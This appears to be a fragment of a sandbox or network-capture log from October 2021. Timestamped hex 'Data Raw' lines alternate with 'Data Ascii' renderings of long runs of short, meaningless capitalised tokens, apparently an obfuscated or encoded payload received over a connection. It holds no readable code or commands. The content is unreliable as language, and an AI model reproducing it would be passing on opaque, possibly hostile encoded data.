                                                                                                2021-10-26 15:35:14 UTC5065INData Raw: 70 20 6e 67 20 50 53 20 50 69 20 55 4d 20 4f 53 20 54 69 20 54 53 4f 20 54 54 4d 20 50 4d 20 4d 69 20 6e 55 20 50 69 20 55 69 20 54 54 70 20 4f 67 20 54 50 20 54 54 4d 20 50 53 20 50 69 20 4d 70 20 55 4d 20 55 69 20 54 54 69 20 54 54 50 20 54 4f 20 6e 54 20 50 53 20 69 55 20 50 69 20 4d 70 20 4f 69 20 4f 53 20 54 55 20 54 53 4f 20 54 54 4d 20 50 4d 20 4d 69 20 55 69 20 50 69 20 55 69 20 54 54 70 20 4f 67 20 4d 69 53 20 54 54 4d 20 50 53 20 50 69 20 4d 70 20 54 53 50 20 55 69 20 54 54 69 20 54 54 50 20 70 4f 20 4d 50 53 20 50 53 20 69 55 20 50 4d 20 4d 55 20 55 69 20 54 54 69 20 54 54 6e 20 54 54 53 20 70 69 20 50 69 20 69 55 20 6e 6e 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 4d 69 20 54 55 67 20 50 69 20 55 69 20 54 54
                                                                                                Data Ascii: p ng PS Pi UM OS Ti TSO TTM PM Mi nU Pi Ui TTp Og TP TTM PS Pi Mp UM Ui TTi TTP TO nT PS iU Pi Mp Oi OS TU TSO TTM PM Mi Ui Pi Ui TTp Og MiS TTM PS Pi Mp TSP Ui TTi TTP pO MPS PS iU PM MU Ui TTi TTn TTS pi Pi iU nn Pi Ui TTi TTn TSO TTM PS Mi TUg Pi Ui TT
                                                                                                2021-10-26 15:35:14 UTC5067INData Raw: 20 55 50 20 54 6e 20 4d 53 50 20 4d 53 6e 20 4d 53 50 20 50 69 20 6e 4f 20 70 70 20 54 54 67 20 54 53 4f 20 67 20 50 53 20 69 55 20 50 53 20 54 6e 20 55 69 20 54 54 69 20 54 53 53 20 6e 6e 20 67 69 20 54 55 20 4d 4d 69 20 69 69 20 67 53 20 54 6e 54 20 54 54 69 20 54 54 6e 20 54 53 6e 20 55 55 20 54 67 50 20 69 55 20 50 53 20 69 55 20 69 4d 20 70 69 20 54 54 6e 20 54 53 4f 20 54 54 70 20 4f 67 20 54 70 4d 20 50 53 20 50 69 20 4f 69 20 54 53 70 20 55 55 20 54 54 53 20 55 70 20 4d 50 20 54 53 20 50 6e 20 4d 4f 20 54 6e 50 20 4f 70 20 54 54 70 20 70 4f 20 4d 4d 6e 20 50 53 20 69 55 20 50 70 20 69 69 20 54 4d 54 20 55 55 20 55 67 20 6e 6e 20 4d 20 54 55 20 4d 4d 69 20 69 69 20 67 53 20 54 6e 54 20 54 54 69 20 54 54 6e 20 54 53 6e 20 4f 55 20 50 53 20 4d 69 20
                                                                                                Data Ascii: UP Tn MSP MSn MSP Pi nO pp TTg TSO g PS iU PS Tn Ui TTi TSS nn gi TU MMi ii gS TnT TTi TTn TSn UU TgP iU PS iU iM pi TTn TSO TTp Og TpM PS Pi Oi TSp UU TTS Up MP TS Pn MO TnP Op TTp pO MMn PS iU Pp ii TMT UU Ug nn M TU MMi ii gS TnT TTi TTn TSn OU PS Mi
                                                                                                2021-10-26 15:35:14 UTC5068INData Raw: 67 54 20 4d 53 4f 20 4d 67 70 20 70 20 6e 53 20 54 4d 54 20 54 67 4f 20 54 4d 67 20 54 53 69 20 50 53 20 69 55 20 69 54 20 55 4f 20 50 50 20 54 54 69 20 54 54 6e 20 54 53 67 20 54 6e 4d 20 4d 67 70 20 54 70 20 4d 67 20 67 53 20 4d 69 20 54 54 69 20 54 54 6e 20 54 53 67 20 4f 4f 20 50 67 20 67 67 20 50 67 20 4d 4d 20 70 69 20 55 4d 20 54 70 50 20 54 54 50 20 55 55 20 4d 53 50 20 69 55 20 50 53 20 69 55 20 54 4d 69 20 54 4f 55 20 54 54 6e 20 54 53 4f 20 54 54 55 20 4d 70 20 55 54 20 50 53 20 50 69 20 4f 69 20 54 6e 4d 20 54 54 6e 20 6e 54 20 54 53 67 20 67 6e 20 69 4f 20 4d 70 20 50 69 20 55 69 20 54 54 4d 20 54 54 6e 20 54 4f 20 54 54 4d 20 54 54 4d 20 4d 69 53 20 50 53 20 50 70 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 69 20 50 53 20 4d 50 69
                                                                                                Data Ascii: gT MSO Mgp p nS TMT TgO TMg TSi PS iU iT UO PP TTi TTn TSg TnM Mgp Tp Mg gS Mi TTi TTn TSg OO Pg gg Pg MM pi UM TpP TTP UU MSP iU PS iU TMi TOU TTn TSO TTU Mp UT PS Pi Oi TnM TTn nT TSg gn iO Mp Pi Ui TTM TTn TO TTM TTM MiS PS Pp Ui TTi TTn TSO TTi PS MPi
                                                                                                2021-10-26 15:35:14 UTC5069INData Raw: 4f 20 4d 69 4d 20 70 70 20 54 53 4f 20 54 54 4d 20 50 69 20 6e 55 20 50 20 50 69 20 55 69 20 54 54 55 20 4f 67 20 54 67 20 54 54 67 20 50 53 20 50 69 20 54 6e 55 20 53 20 55 69 20 54 54 69 20 54 54 67 20 54 54 6e 20 54 4d 54 20 54 55 55 20 54 67 50 20 67 6e 20 54 54 54 20 6e 54 20 54 54 6e 20 54 53 4d 20 54 53 50 20 6e 4d 20 4d 54 70 20 69 55 20 50 53 20 50 69 20 6e 53 20 54 54 4f 20 54 67 4f 20 54 4d 53 20 4f 70 20 50 53 20 69 55 20 69 55 20 67 70 20 55 54 20 54 4d 67 20 54 53 53 20 54 53 50 20 4d 67 69 20 6e 50 20 54 4d 53 20 50 53 20 50 69 20 55 50 20 67 20 70 54 20 54 53 4f 20 54 54 4d 20 50 54 20 6e 6e 20 69 50 20 50 69 20 55 69 20 54 54 55 20 54 53 67 20 54 53 69 20 54 4d 54 20 67 50 20 50 4d 20 67 6e 20 54 54 53 20 4d 53 70 20 54 54 20 6e 54 20 54
                                                                                                Data Ascii: O MiM pp TSO TTM Pi nU P Pi Ui TTU Og Tg TTg PS Pi TnU S Ui TTi TTg TTn TMT TUU TgP gn TTT nT TTn TSM TSP nM MTp iU PS Pi nS TTO TgO TMS Op PS iU iU gp UT TMg TSS TSP Mgi nP TMS PS Pi UP g pT TSO TTM PT nn iP Pi Ui TTU TSg TSi TMT gP PM gn TTS MSp TT nT T
                                                                                                2021-10-26 15:35:14 UTC5071INData Raw: 54 54 6e 20 54 53 67 20 54 4d 53 20 6e 70 20 6e 20 50 53 20 50 69 20 55 53 20 4d 4f 20 69 70 20 54 53 4f 20 54 54 4d 20 50 70 20 4d 6e 20 69 4f 20 50 55 20 54 4d 6e 20 54 69 70 20 54 54 20 55 6e 20 54 54 4d 20 50 53 20 50 4d 20 4f 67 20 54 53 69 20 55 69 20 54 54 69 20 54 4d 6e 20 54 4d 67 20 4f 4d 20 69 4f 20 4d 4d 20 4d 50 20 54 53 4d 20 6e 54 20 54 54 4f 20 4f 69 20 54 50 54 20 4f 55 20 50 50 20 4d 69 20 54 53 4f 20 50 69 20 55 69 20 54 4d 53 20 54 4d 53 20 54 53 53 20 54 54 20 67 4d 20 69 55 20 50 53 20 50 53 20 54 4d 54 20 54 54 4d 20 4f 69 20 55 6e 20 54 4d 53 20 50 4f 20 6e 50 20 67 50 20 50 69 20 55 69 20 54 54 55 20 4d 69 4f 20 67 6e 20 54 54 4d 20 50 53 20 69 4f 20 4f 67 20 54 53 4f 20 55 69 20 54 54 69 20 54 4d 6e 20 54 53 54 20 54 4d 54 20 6e
                                                                                                Data Ascii: TTn TSg TMS np n PS Pi US MO ip TSO TTM Pp Mn iO PU TMn Tip TT Un TTM PS PM Og TSi Ui TTi TMn TMg OM iO MM MP TSM nT TTO Oi TPT OU PP Mi TSO Pi Ui TMS TMS TSS TT gM iU PS PS TMT TTM Oi Un TMS PO nP gP Pi Ui TTU MiO gn TTM PS iO Og TSO Ui TTi TMn TST TMT n
                                                                                                2021-10-26 15:35:14 UTC5072INData Raw: 54 69 20 54 54 67 20 54 53 54 20 4f 55 20 50 53 20 6e 50 20 54 70 20 50 69 20 55 69 20 54 54 55 20 55 20 54 4d 70 20 54 54 4d 20 50 53 20 50 4d 20 50 55 20 67 70 20 55 69 20 4f 20 55 69 20 54 53 4f 20 54 54 4d 20 50 69 20 6e 6e 20 67 55 20 50 69 20 55 69 20 54 54 55 20 54 53 67 20 54 53 4f 20 54 54 20 54 70 20 69 55 20 50 53 20 50 53 20 4f 4d 20 4f 53 20 4f 54 20 54 53 55 20 54 54 4d 20 50 4d 20 4d 6e 20 50 4d 20 70 54 20 54 4d 6e 20 4d 53 55 20 54 4d 6e 20 6e 53 20 4d 54 55 20 67 4d 20 50 54 20 4d 70 20 54 67 67 20 55 69 20 54 54 69 20 54 4d 6e 20 70 69 20 4d 50 54 20 4d 67 70 20 70 4d 20 67 4d 20 50 67 20 54 6e 53 20 54 53 53 20 4f 4f 20 54 53 4f 20 54 54 4d 20 69 54 20 4f 50 20 55 54 20 50 69 20 55 69 20 54 4d 53 20 54 70 4f 20 54 4f 20 4f 4d 20 50 53
                                                                                                Data Ascii: Ti TTg TST OU PS nP Tp Pi Ui TTU U TMp TTM PS PM PU gp Ui O Ui TSO TTM Pi nn gU Pi Ui TTU TSg TSO TT Tp iU PS PS OM OS OT TSU TTM PM Mn PM pT TMn MSU TMn nS MTU gM PT Mp Tgg Ui TTi TMn pi MPT Mgp pM gM Pg TnS TSS OO TSO TTM iT OP UT Pi Ui TMS TpO TO OM PS
                                                                                                2021-10-26 15:35:14 UTC5073INData Raw: 54 54 50 20 4d 67 20 54 67 4d 20 54 53 55 20 4f 67 20 54 69 70 20 54 54 4d 20 50 53 20 50 69 20 6e 70 20 6e 6e 20 55 69 20 54 54 69 20 54 54 67 20 4d 4d 50 20 55 53 20 50 53 20 69 55 20 50 54 20 55 4f 20 54 4d 20 54 54 69 20 54 54 6e 20 54 53 6e 20 54 69 20 4f 20 69 55 20 50 53 20 50 53 20 54 54 70 20 69 20 55 69 20 54 55 4f 20 54 54 53 20 4d 70 20 4d 53 6e 20 50 53 20 50 69 20 55 4d 20 54 4d 20 4f 20 54 53 4f 20 54 54 4d 20 50 69 20 54 55 55 20 54 55 20 50 69 20 55 69 20 54 54 50 20 4d 70 20 50 67 20 54 54 4d 20 50 53 20 50 69 20 6e 70 20 54 67 20 55 69 20 54 54 69 20 54 54 67 20 6e 6e 20 4d 4f 20 54 4f 20 4d 4d 69 20 69 69 20 67 53 20 54 6e 54 20 54 54 69 20 54 54 6e 20 54 53 6e 20 54 69 20 6e 4f 20 69 55 20 50 53 20 50 53 20 50 4f 20 69 4d 20 54 54 6e
                                                                                                Data Ascii: TTP Mg TgM TSU Og Tip TTM PS Pi np nn Ui TTi TTg MMP US PS iU PT UO TM TTi TTn TSn Ti O iU PS PS TTp i Ui TUO TTS Mp MSn PS Pi UM TM O TSO TTM Pi TUU TU Pi Ui TTP Mp Pg TTM PS Pi np Tg Ui TTi TTg nn MO TO MMi ii gS TnT TTi TTn TSn Ti nO iU PS PS PO iM TTn
                                                                                                2021-10-26 15:35:14 UTC5074INData Raw: 20 50 67 20 54 54 69 20 54 54 6e 20 54 53 67 20 54 6e 69 20 50 53 20 4d 70 20 50 54 20 67 55 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 4f 55 20 50 53 20 4f 4f 20 55 6e 20 50 69 20 6e 69 20 50 4d 20 54 54 6e 20 54 53 4f 20 54 54 67 20 67 67 20 53 20 50 4d 20 50 69 20 55 50 20 54 54 50 20 54 54 6e 20 54 53 4f 20 4f 69 20 50 53 20 69 55 20 67 50 20 67 53 20 50 55 20 54 54 69 20 54 54 6e 20 54 53 6e 20 54 53 4d 20 67 53 20 50 6e 20 4d 53 20 69 4f 20 54 53 4f 20 54 67 53 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 4d 50 20 50 54 20 50 6e 20 4d 4f 20 54 70 54 20 54 54 6e 20 70 20 54 6e 53 20 54 54 4d 20 50 53 20 50 55 20 69 67 20 54 4d 20 54 67 67 20 54 54 69 20 54 54 6e 20 54 53 4f 20 55 70 20 67 50 20 50 67 20 70 50 20 4d 50 69 20 55 69 20 54 54 69 20 54 4d
                                                                                                Data Ascii: Pg TTi TTn TSg Tni PS Mp PT gU Ui TTi TTn TSO OU PS OO Un Pi ni PM TTn TSO TTg gg S PM Pi UP TTP TTn TSO Oi PS iU gP gS PU TTi TTn TSn TSM gS Pn MS iO TSO TgS TTn TSO TTM MP PT Pn MO TpT TTn p TnS TTM PS PU ig TM Tgg TTi TTn TSO Up gP Pg pP MPi Ui TTi TM
                                                                                                2021-10-26 15:35:14 UTC5076INData Raw: 20 50 69 20 4f 69 20 54 54 70 20 54 53 4f 20 50 67 20 54 4d 4d 20 50 4d 20 50 6e 20 67 20 54 50 6e 20 54 4d 70 20 4f 6e 20 70 4f 20 54 53 69 20 54 54 4d 20 4d 67 50 20 69 55 20 50 53 20 50 69 20 54 53 53 20 54 54 69 20 54 54 6e 20 54 4d 69 20 54 54 69 20 54 55 55 20 54 67 50 20 67 70 20 50 20 55 50 20 55 55 20 54 54 4f 20 54 4d 67 20 4d 67 69 20 6e 50 20 4d 20 50 53 20 50 69 20 55 50 20 67 20 6e 54 20 54 53 4f 20 54 54 4d 20 50 54 20 67 55 20 67 53 20 67 53 20 54 54 69 20 54 54 4d 20 4f 55 20 4d 69 6e 20 69 20 50 70 20 69 55 20 50 53 20 69 50 20 6e 69 20 4f 50 20 55 70 20 6e 50 20 54 69 20 50 20 69 55 20 50 53 20 50 53 20 54 4d 69 20 54 55 20 54 54 70 20 54 53 4f 20 54 54 55 20 69 67 20 4d 4f 20 69 70 20 54 70 20 6e 70 20 54 54 4d 20 4d 50 54 20 4d 54 55
                                                                                                Data Ascii: Pi Oi TTp TSO Pg TMM PM Pn g TPn TMp On pO TSi TTM MgP iU PS Pi TSS TTi TTn TMi TTi TUU TgP gp P UP UU TTO TMg Mgi nP M PS Pi UP g nT TSO TTM PT gU gS gS TTi TTM OU Min i Pp iU PS iP ni OP Up nP Ti P iU PS PS TMi TU TTp TSO TTU ig MO ip Tp np TTM MPT MTU
                                                                                                2021-10-26 15:35:14 UTC5077INData Raw: 4d 55 20 55 69 20 54 54 70 20 4f 50 20 54 53 4f 20 54 54 4d 20 67 67 20 53 20 50 4d 20 50 69 20 4f 55 20 54 54 69 20 54 54 6e 20 54 53 4f 20 70 70 20 50 53 20 69 55 20 67 50 20 67 70 20 55 50 20 54 54 4d 20 54 54 53 20 54 4d 4d 20 4f 67 20 4d 6e 20 4d 4d 20 4d 4d 70 20 54 55 6e 20 55 69 20 54 54 69 20 54 54 70 20 70 4f 20 50 69 20 50 53 20 69 55 20 50 70 20 67 4d 20 50 4f 20 54 70 4d 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 67 70 20 54 6e 53 20 6e 53 20 54 55 6e 20 55 69 20 54 54 69 20 54 54 70 20 4d 20 54 70 54 20 50 53 20 69 55 20 50 70 20 67 53 20 54 67 69 20 54 54 69 20 54 54 6e 20 54 53 67 20 54 54 4f 20 69 67 20 69 50 20 67 54 20 50 54 20 54 54 69 20 55 55 20 55 67 20 6e 53 20 54 70 50 20 4d 53 20 4d 6e 20 4d 53 67 20 50 69 20 55 69 20 4f 6e 20 70 4f
                                                                                                Data Ascii: MU Ui TTp OP TSO TTM gg S PM Pi OU TTi TTn TSO pp PS iU gP gp UP TTM TTS TMM Og Mn MM MMp TUn Ui TTi TTp pO Pi PS iU Pp gM PO TpM TTn TSO TMM gp TnS nS TUn Ui TTi TTp M TpT PS iU Pp gS Tgi TTi TTn TSg TTO ig iP gT PT TTi UU Ug nS TpP MS Mn MSg Pi Ui On pO
                                                                                                2021-10-26 15:35:14 UTC5078INData Raw: 4f 53 20 54 6e 54 20 54 53 4f 20 54 54 4d 20 50 70 20 50 50 20 54 55 20 4d 53 69 20 55 69 20 54 54 69 20 54 54 6e 20 50 67 20 54 4d 67 20 50 67 20 50 70 20 67 20 54 69 4d 20 54 4d 69 20 4d 50 53 20 54 54 6e 20 54 53 4f 20 54 54 55 20 4d 69 20 54 4d 70 20 4d 70 20 54 54 4f 20 55 50 20 54 54 69 20 54 54 50 20 54 4d 67 20 4f 69 20 50 70 20 4d 69 20 54 54 50 20 50 50 20 55 69 20 54 54 70 20 4f 67 20 54 6e 4f 20 54 54 4d 20 50 53 20 50 55 20 4d 69 20 54 4d 53 20 54 4d 69 20 6e 67 20 54 54 70 20 54 53 4f 20 54 54 55 20 67 54 20 69 4f 20 4d 69 20 67 53 20 54 67 4f 20 54 54 69 20 54 54 6e 20 54 53 67 20 55 55 20 54 55 4d 20 69 55 20 50 53 20 69 55 20 54 4d 70 20 54 53 50 20 70 4f 20 54 54 53 20 54 54 4d 20 70 70 20 69 55 20 50 53 20 50 69 20 4f 55 20 54 54 69 20
                                                                                                Data Ascii: OS TnT TSO TTM Pp PP TU MSi Ui TTi TTn Pg TMg Pg Pp g TiM TMi MPS TTn TSO TTU Mi TMp Mp TTO UP TTi TTP TMg Oi Pp Mi TTP PP Ui TTp Og TnO TTM PS PU Mi TMS TMi ng TTp TSO TTU gT iO Mi gS TgO TTi TTn TSg UU TUM iU PS iU TMp TSP pO TTS TTM pp iU PS Pi OU TTi
                                                                                                2021-10-26 15:35:14 UTC5080INData Raw: 54 4f 20 54 70 4d 20 54 53 6e 20 70 4f 20 54 69 67 20 50 53 20 69 55 20 50 4d 20 67 53 20 54 67 4f 20 54 54 69 20 54 54 6e 20 54 53 67 20 67 54 20 4d 54 55 20 69 55 20 50 53 20 70 53 20 6e 67 20 4f 50 20 4f 70 20 6e 50 20 54 69 20 6e 6e 20 69 55 20 50 53 20 50 53 20 4f 4d 20 55 4d 20 54 53 54 20 6e 69 20 54 54 4d 20 50 53 20 4d 69 20 54 4f 54 20 50 69 20 55 69 20 54 54 70 20 55 4f 20 4f 55 20 4f 54 20 69 4f 20 70 53 20 4d 50 20 4d 4d 67 20 54 4d 69 20 54 6e 67 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 4d 70 20 54 6e 4f 20 50 53 20 50 69 20 55 4d 20 4f 53 20 70 70 20 54 53 55 20 54 54 4d 20 50 4d 20 4f 20 54 55 4d 20 50 69 20 55 69 20 54 54 69 20 54 54 69 20 6e 6e 20 54 70 67 20 54 6e 20 4d 4d 69 20 69 69 20 67 53 20 54 6e 54 20 54 54 69 20 54 54 6e 20 54 53
                                                                                                Data Ascii: TO TpM TSn pO Tig PS iU PM gS TgO TTi TTn TSg gT MTU iU PS pS ng OP Op nP Ti nn iU PS PS OM UM TST ni TTM PS Mi TOT Pi Ui TTp UO OU OT iO pS MP MMg TMi Tng TTn TSO TMM Mp TnO PS Pi UM OS pp TSU TTM PM O TUM Pi Ui TTi TTi nn Tpg Tn MMi ii gS TnT TTi TTn TS
                                                                                                2021-10-26 15:35:14 UTC5081INData Raw: 54 20 69 55 20 50 53 20 70 53 20 70 6e 20 54 69 53 20 54 54 70 20 6e 54 20 54 54 4d 20 50 53 20 67 50 20 4d 20 50 67 20 55 69 20 55 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 54 54 20 69 55 20 50 53 20 67 4f 20 54 4d 69 20 54 50 20 54 54 6e 20 54 53 4f 20 54 54 55 20 67 54 20 50 53 20 67 6e 20 4d 55 20 54 4d 69 20 54 67 53 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 70 50 20 54 4f 67 20 50 53 20 50 69 20 4f 69 20 54 53 6e 20 55 55 20 4f 70 20 55 70 20 50 67 20 54 70 20 54 55 20 50 4d 20 55 69 20 54 54 69 20 4d 70 20 54 50 4f 20 54 54 4d 20 50 53 20 50 55 20 4d 69 20 70 54 20 54 4d 6e 20 54 67 54 20 54 54 6e 20 54 53 4f 20 4f 4f 20 4d 20 50 54 20 50 53 20 54 4d 20 55 69 20 54 54 69 20 54 54 6e 20 55 6e 20 54 54 4d 20 50 53 20 67 67 20 54 55 20 54 69 6e 20 54 54
                                                                                                Data Ascii: T iU PS pS pn TiS TTp nT TTM PS gP M Pg Ui Ui TTn TSO TTM TT iU PS gO TMi TP TTn TSO TTU gT PS gn MU TMi TgS TTn TSO TMM pP TOg PS Pi Oi TSn UU Op Up Pg Tp TU PM Ui TTi Mp TPO TTM PS PU Mi pT TMn TgT TTn TSO OO M PT PS TM Ui TTi TTn Un TTM PS gg TU Tin TT
                                                                                                2021-10-26 15:35:14 UTC5082INData Raw: 54 54 4d 20 50 54 20 69 67 20 4d 20 50 67 20 55 69 20 67 53 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 54 50 20 69 55 20 50 53 20 67 4f 20 69 4d 20 54 50 20 54 54 6e 20 54 53 4f 20 54 54 70 20 54 55 20 4d 4d 69 20 4d 4d 20 4d 67 53 20 6e 69 20 4f 53 20 54 67 55 20 54 53 4f 20 54 54 4d 20 50 4d 20 4d 69 20 54 50 69 20 50 69 20 55 69 20 54 4d 53 20 54 53 69 20 70 69 20 54 4d 67 20 4d 53 20 50 50 20 4d 70 20 54 50 4d 20 55 69 20 54 54 69 20 54 4d 6e 20 70 69 20 54 54 4f 20 4d 50 20 50 54 20 50 6e 20 4d 4f 20 54 70 6e 20 54 53 4d 20 4f 50 20 54 53 70 20 55 55 20 4d 53 54 20 69 55 20 50 53 20 70 53 20 6e 6e 20 4f 50 20 54 4d 70 20 6e 50 20 54 4d 53 20 4d 70 20 54 50 55 20 50 53 20 50 69 20 4f 69 20 4f 69 20 54 4d 4d 20 6e 53 20 54 54 50 20 70 4d 20 4d 6e 20 54 4f
                                                                                                Data Ascii: TTM PT ig M Pg Ui gS TTn TSO TTM TP iU PS gO iM TP TTn TSO TTp TU MMi MM MgS ni OS TgU TSO TTM PM Mi TPi Pi Ui TMS TSi pi TMg MS PP Mp TPM Ui TTi TMn pi TTO MP PT Pn MO Tpn TSM OP TSp UU MST iU PS pS nn OP TMp nP TMS Mp TPU PS Pi Oi Oi TMM nS TTP pM Mn TO
                                                                                                2021-10-26 15:35:14 UTC5084INData Raw: 20 4d 53 20 4d 69 20 54 4d 6e 20 50 50 20 55 69 20 54 54 70 20 54 53 67 20 54 54 54 20 55 55 20 4d 53 69 20 69 55 20 50 53 20 70 53 20 54 4d 53 20 54 4d 50 20 4f 69 20 54 53 6e 20 54 4d 69 20 4d 50 20 4d 54 4d 20 70 67 20 4d 4f 20 54 4f 53 20 54 4d 67 20 54 4d 50 20 4d 20 54 69 67 20 50 53 20 69 55 20 50 70 20 67 53 20 4d 70 20 54 54 50 20 54 54 6e 20 54 53 6e 20 4f 55 20 69 55 20 4d 69 20 4d 53 69 20 50 69 20 55 69 20 54 4d 53 20 55 4f 20 54 53 70 20 54 4d 54 20 50 55 20 4f 50 20 4d 53 50 20 50 69 20 55 69 20 54 4d 53 20 54 54 50 20 54 53 53 20 67 54 20 50 53 20 69 4f 20 50 53 20 70 53 20 50 4f 20 4d 67 54 20 54 54 70 20 54 53 4f 20 54 54 55 20 50 4d 20 4d 70 20 50 53 20 50 69 20 55 69 20 54 53 50 20 70 4f 20 54 53 69 20 54 54 4d 20 54 4f 53 20 69 55 20
                                                                                                Data Ascii: MS Mi TMn PP Ui TTp TSg TTT UU MSi iU PS pS TMS TMP Oi TSn TMi MP MTM pg MO TOS TMg TMP M Tig PS iU Pp gS Mp TTP TTn TSn OU iU Mi MSi Pi Ui TMS UO TSp TMT PU OP MSP Pi Ui TMS TTP TSS gT PS iO PS pS PO MgT TTp TSO TTU PM Mp PS Pi Ui TSP pO TSi TTM TOS iU
                                                                                                2021-10-26 15:35:14 UTC5085INData Raw: 20 70 6e 20 67 55 20 4d 69 20 54 53 53 20 50 50 20 55 69 20 54 54 70 20 54 53 6e 20 70 69 20 54 4d 54 20 4d 53 20 67 55 20 4d 70 20 54 6e 70 20 55 69 20 54 54 69 20 54 54 50 20 6e 53 20 54 54 50 20 4d 53 20 4d 6e 20 54 4f 4f 20 4d 55 20 55 69 20 54 55 53 20 54 54 20 67 6e 20 54 54 4d 20 50 53 20 50 4d 20 67 70 20 4f 4d 20 54 53 67 20 54 54 50 20 4f 50 20 54 55 20 50 70 20 50 53 20 69 55 20 50 69 20 67 53 20 55 4d 20 54 54 50 20 54 54 6e 20 54 53 67 20 54 53 4d 20 55 55 20 67 20 69 4d 20 67 53 20 54 53 69 20 54 54 50 20 54 54 6e 20 54 53 6e 20 4f 4d 20 50 50 20 4d 69 20 6e 69 20 50 69 20 55 69 20 54 54 70 20 4f 67 20 55 53 20 54 54 67 20 50 53 20 50 69 20 67 53 20 50 54 20 54 4d 69 20 54 54 20 54 54 6e 20 54 53 4f 20 54 54 55 20 4d 69 20 69 55 20 50 53 20
                                                                                                Data Ascii: pn gU Mi TSS PP Ui TTp TSn pi TMT MS gU Mp Tnp Ui TTi TTP nS TTP MS Mn TOO MU Ui TUS TT gn TTM PS PM gp OM TSg TTP OP TU Pp PS iU Pi gS UM TTP TTn TSg TSM UU g iM gS TSi TTP TTn TSn OM PP Mi ni Pi Ui TTp Og US TTg PS Pi gS PT TMi TT TTn TSO TTU Mi iU PS
                                                                                                2021-10-26 15:35:14 UTC5087INData Raw: 54 54 70 20 54 54 55 20 70 69 20 69 4f 20 69 55 20 6e 67 20 50 69 20 55 69 20 54 54 69 20 50 50 20 54 53 4f 20 54 54 4d 20 67 50 20 54 70 20 54 55 4f 20 54 4f 20 54 67 4d 20 54 53 55 20 4f 67 20 54 69 70 20 54 54 4d 20 50 53 20 50 69 20 69 55 20 67 53 20 55 20 54 54 69 20 54 54 6e 20 54 53 67 20 54 53 4d 20 67 53 20 4d 6e 20 4d 53 20 4d 4d 20 54 4d 55 20 55 6e 20 54 70 50 20 54 54 50 20 55 55 20 4d 53 50 20 69 55 20 50 53 20 69 55 20 55 67 20 4f 53 20 4d 4d 4f 20 54 53 4f 20 54 54 4d 20 50 4d 20 69 70 20 67 54 20 69 69 20 54 54 69 20 54 4d 4d 20 4f 67 20 54 67 6e 20 54 54 4d 20 50 53 20 50 55 20 69 70 20 4d 6e 20 6e 54 20 55 69 20 54 53 53 20 54 53 50 20 54 54 50 20 4f 67 20 50 70 20 50 54 20 50 69 20 4f 69 20 4f 69 20 4f 55 20 6e 53 20 54 4d 4d 20 50 6e
                                                                                                Data Ascii: TTp TTU pi iO iU ng Pi Ui TTi PP TSO TTM gP Tp TUO TO TgM TSU Og Tip TTM PS Pi iU gS U TTi TTn TSg TSM gS Mn MS MM TMU Un TpP TTP UU MSP iU PS iU Ug OS MMO TSO TTM PM ip gT ii TTi TMM Og Tgn TTM PS PU ip Mn nT Ui TSS TSP TTP Og Pp PT Pi Oi Oi OU nS TMM Pn
                                                                                                2021-10-26 15:35:14 UTC5088INData Raw: 54 69 20 54 54 20 4f 4d 20 54 54 4d 20 50 53 20 50 4d 20 4d 70 20 67 55 20 55 50 20 54 54 69 20 54 4d 6e 20 70 4f 20 54 67 67 20 50 53 20 69 55 20 50 70 20 54 70 20 69 4d 20 70 6e 20 54 54 6e 20 54 53 4f 20 54 54 70 20 4d 70 20 54 70 54 20 50 53 20 50 69 20 55 4d 20 4f 50 20 54 53 55 20 54 4f 20 70 50 20 50 53 20 69 55 20 50 69 20 67 53 20 4f 69 20 54 54 50 20 54 54 6e 20 54 53 67 20 55 55 20 4d 67 6e 20 69 55 20 50 53 20 70 53 20 69 4d 20 70 6e 20 54 54 6e 20 54 53 4f 20 54 54 70 20 4d 70 20 67 67 20 50 54 20 50 69 20 4f 69 20 54 4d 20 54 53 67 20 54 53 55 20 54 54 4d 20 50 70 20 6e 55 20 4d 4f 20 50 69 20 55 69 20 54 54 55 20 4f 55 20 4d 20 54 50 6e 20 50 53 20 69 55 20 50 70 20 69 69 20 54 4d 54 20 4f 6e 20 55 67 20 54 53 6e 20 54 69 20 6e 6e 20 69 55
                                                                                                Data Ascii: Ti TT OM TTM PS PM Mp gU UP TTi TMn pO Tgg PS iU Pp Tp iM pn TTn TSO TTp Mp TpT PS Pi UM OP TSU TO pP PS iU Pi gS Oi TTP TTn TSg UU Mgn iU PS pS iM pn TTn TSO TTp Mp gg PT Pi Oi TM TSg TSU TTM Pp nU MO Pi Ui TTU OU M TPn PS iU Pp ii TMT On Ug TSn Ti nn iU
                                                                                                2021-10-26 15:35:14 UTC5089INData Raw: 20 54 54 4d 20 50 70 20 6e 55 20 4d 4d 4d 20 50 69 20 55 69 20 54 4d 53 20 54 54 20 70 70 20 54 54 4d 20 50 53 20 50 4d 20 67 6e 20 55 4f 20 54 55 50 20 54 54 69 20 54 54 6e 20 54 53 67 20 54 53 6e 20 67 54 20 69 53 20 4d 53 20 69 55 20 69 4d 20 54 67 20 54 54 6e 20 54 53 4f 20 54 54 70 20 6e 70 20 53 20 50 53 20 50 69 20 55 53 20 4d 4f 20 54 53 4d 20 54 53 55 20 54 54 4d 20 50 70 20 4d 69 20 54 70 54 20 50 69 20 55 69 20 54 54 70 20 54 6e 54 20 6e 69 20 54 4d 4d 20 4d 50 20 4d 54 69 20 4d 67 20 67 53 20 4d 69 20 54 54 69 20 54 54 6e 20 54 53 67 20 54 53 6e 20 67 54 20 69 53 20 4d 53 20 69 4f 20 54 54 70 20 54 4d 67 20 55 53 20 54 55 4f 20 54 54 53 20 4d 70 20 4d 53 6e 20 50 53 20 50 69 20 55 4d 20 4f 53 20 54 4f 67 20 54 53 4f 20 54 54 4d 20 50 4d 20 4d
                                                                                                Data Ascii: TTM Pp nU MMM Pi Ui TMS TT pp TTM PS PM gn UO TUP TTi TTn TSg TSn gT iS MS iU iM Tg TTn TSO TTp np S PS Pi US MO TSM TSU TTM Pp Mi TpT Pi Ui TTp TnT ni TMM MP MTi Mg gS Mi TTi TTn TSg TSn gT iS MS iO TTp TMg US TUO TTS Mp MSn PS Pi UM OS TOg TSO TTM PM M
